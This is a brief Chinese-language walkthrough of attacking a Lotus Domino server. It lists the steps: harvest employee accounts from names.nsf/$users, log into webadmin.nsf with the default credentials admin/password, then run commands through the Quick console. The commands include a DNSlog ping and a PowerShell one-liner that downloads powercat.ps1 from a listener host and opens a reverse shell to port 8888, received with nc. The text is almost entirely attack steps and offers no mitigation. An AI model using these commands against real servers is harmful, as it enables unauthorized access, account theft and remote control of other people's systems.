Lotus Domino簡介
應用程序使用Lotus Domino開發。Lotus Domino是一款基於WEB合作的應用程序架構,集電子郵件、文檔數據庫、快速應用開發技術以及Web技術為一體的電子郵件與群集平台,運行在Linux/Unix和Microsoft Windows操作系統平台下。
可通過webadmin.nsf訪問控制台進行接口管理。Lotus Domino控制台提供了各種命令用於管理服務器。只要獲取管理員權限后,就可以執行各種命令,造成命令執行。
Lotus Domino指紋信息:
漏洞利用
可以訪問http://10.168.2.4/names.nsf/$users 獲取員工賬號信息
訪問控制台http://10.168.2.4/webadmin.nsf 使用管理員賬號admin,默認密碼password,登陸系統
選擇"Server"-"Status"-"Quick console",執行命令
命令格式:
load cmd /c ping c4vm7l.dnslog.cn
使用powershell 執行powercat反彈shell:
執行命令,使用powershell遠程下載執行powercat.ps1,反彈shell到本機10.82.108.62的8888端口
load cmd /c powershell IEX (New-Object
System.Net.Webclient).DownloadString('http://10.82.108.62/powercat.ps1'); powercat -c
10.82.108.62 -p 8888 -e cmd
使用nc監聽本地的8888端口,接收shell會話
